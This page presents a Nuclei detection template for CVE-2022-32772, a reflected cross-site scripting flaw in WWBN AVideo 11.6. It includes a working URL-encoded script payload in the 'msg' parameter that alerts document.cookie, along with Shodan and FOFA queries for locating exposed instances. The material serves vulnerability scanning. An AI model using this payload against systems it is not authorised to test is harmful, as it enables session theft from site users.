WWBN AVideo 11.6 - Cross-Site Scripting
ID: CVE-2022-32772
Severity: medium
Author: arafatansari
Tags: cve2022,cve,avideo,xss,wwbn
Description
Section titled “Description”WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the ‘msg’ parameter, which is inserted into the document with insufficient sanitization.
YAML Source
Section titled “YAML Source”id: CVE-2022-32772
info: name: WWBN AVideo 11.6 - Cross-Site Scripting author: arafatansari severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32772 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 epss-score: 0.00074 epss-percentile: 0.31793 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wwbn product: avideo shodan-query: - http.html:"AVideo" - http.html:"avideo" fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn
http: - method: GET path: - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
matchers-condition: and matchers: - type: word part: body words: - 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100fd47b964e4e4d47a2f263e88bee7f045cc238a9e61258bfb4c736c1a04fed44d022100f472ac0d879cf59c77b71512f8ae1f47a1a9236cb6860a88f39dc036c29a4d70:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-32772.yaml"